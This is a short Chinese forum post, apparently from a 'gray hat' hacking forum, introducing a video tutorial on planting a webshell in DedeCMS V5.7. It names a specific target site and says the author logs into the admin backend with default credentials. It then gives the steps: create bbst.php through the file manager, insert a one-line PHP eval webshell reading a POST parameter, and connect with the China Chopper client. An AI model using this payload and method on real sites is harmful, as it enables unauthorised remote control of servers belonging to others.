Web-Attak系列教程第二季0x07讲——dedecmsV5.7后台拿shell

普及网络安全知识，推动信息技术发展。

为祖国的网络安全撑起一片蓝天，为网络安全爱好者构建一方家园。

欢迎来到灰帽程序员论坛，我们的网址是：

http://www.hmhacker.org

论坛以技术交流为主，非商业性质论坛。

大家好，我是小雨，QQ:798033502

今天给大家带来的教程是《Web-Attak系列教程第二季0x07讲——dedecmsV5.7后台拿shell》

Site:http://5esou.com/

视频地址：http://v.youku.com/v_show/id_XNTQzNzExMjIw.html

后台默认的，我之前登录过一次，现在重新登录下。

模块——文件管理器——新建文件——文件名：bbst.php

文件内容：<?php @eval($_POST['cmcc']);?>

菜刀连接之

OK，成功拿下shell.

菜鸟作品，大牛勿喷！